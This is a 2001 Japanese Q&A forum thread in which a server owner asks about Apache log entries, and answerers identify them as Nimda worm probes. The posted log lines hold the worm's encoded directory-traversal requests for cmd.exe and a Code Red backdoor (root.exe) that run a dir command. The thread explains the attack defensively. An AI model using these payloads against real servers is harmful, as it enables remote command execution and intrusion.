OKWAVEのAI「あい」が美容・健康の悩みに最適な回答をご提案!
-PR-
締切り
済み

apacheのログでこんなの出たんですけど…

  • 暇なときにでも
  • 質問No.138486
  • 閲覧数80
  • ありがとう数0
  • 気になる数0
  • 回答数2
  • コメント数0

お礼率 50% (4/8)

apacheのログで3日ほど前から以下の様なアクセスが
いろいろなIPアドレスから来るのですが
何をやろうとしているのでしょうか?

211.196.98.124 - - [20/Sep/2001:03:32:52 +0900] "GET /scripts/root.exe?/c+dir HTTP/1.0" 403 280
211.196.98.124 - - [20/Sep/2001:03:32:53 +0900] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 403 278
211.196.98.124 - - [20/Sep/2001:03:32:53 +0900] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 403 288
211.196.98.124 - - [20/Sep/2001:03:32:53 +0900] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 403 288
211.196.98.124 - - [20/Sep/2001:03:32:54 +0900] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 403 302
211.196.98.124 - - [20/Sep/2001:03:32:54 +0900] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 403 319
中略
211.196.98.124 - - [20/Sep/2001:03:32:57 +0900] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 281
211.196.98.124 - - [20/Sep/2001:03:32:58 +0900] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 403 302
211.196.98.124 - - [20/Sep/2001:03:32:58 +0900] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 403 302

なんとなくdirコマンドでCドライブの内容を調べようとしているのはわかるのですが…
環境はWinNT4.0sp4 apache 1.3.20です。

あと、エラーコード(?)の403と404は知っているのですが
400はどういう意味なのでしょうか?

また何か問題はあるのでしょうか?
通報する
  • 回答数2
  • 気になる
    質問をブックマークします。
    マイページでまとめて確認できます。

回答 (全2件)

  • 回答No.1
レベル9

ベストアンサー率 37% (22/58)

おそらくNIMDAウイルスが侵入しようとした跡でしょう。 詳細はGooニュース http://channel.goo.ne.jp/news/mycom/it/20010920/20010920-01.html を参照してください。 400 -Bad Request は「間違ったURLを入力したのでサーバが理解できなかった」です。
おそらくNIMDAウイルスが侵入しようとした跡でしょう。
詳細はGooニュース
http://channel.goo.ne.jp/news/mycom/it/20010920/20010920-01.html
を参照してください。

400 -Bad Request は「間違ったURLを入力したのでサーバが理解できなかった」です。


  • 回答No.2
レベル6

ベストアンサー率 20% (1/5)

NIMDAのアタックログです。 ですがIISのセキュリティホールを狙ったものですので、 Apacheには感染の危険性はありません。 IISには大ざっぱに言うと、とあるセキュリティホールを 突くと、Webディレクトリからシステムディレクトリへ侵入するという 大穴があります。上記はそれを狙ったもので、『root.exe』を リクエストしているのは、もしそのIISがCodeRedに感染していた 場 ...続きを読む
NIMDAのアタックログです。
ですがIISのセキュリティホールを狙ったものですので、
Apacheには感染の危険性はありません。
IISには大ざっぱに言うと、とあるセキュリティホールを
突くと、Webディレクトリからシステムディレクトリへ侵入するという
大穴があります。上記はそれを狙ったもので、『root.exe』を
リクエストしているのは、もしそのIISがCodeRedに感染していた
場合は、そのバックドアを利用して侵入を図ろう、というものです。
(ちなみに、次回はIPは伏せた方が良いと思いますよ。)
このQ&Aのテーマ
このQ&Aで解決しましたか?
関連するQ&A
-PR-
-PR-
このQ&Aにこう思った!同じようなことあった!感想や体験を書こう
このQ&Aにはまだコメントがありません。
あなたの思ったこと、知っていることをここにコメントしてみましょう。

その他の関連するQ&A、テーマをキーワードで探す

キーワードでQ&A、テーマを検索する
-PR-
-PR-
-PR-

特集


いま みんなが気になるQ&A

関連するQ&A

-PR-

ピックアップ

-PR-
ページ先頭へ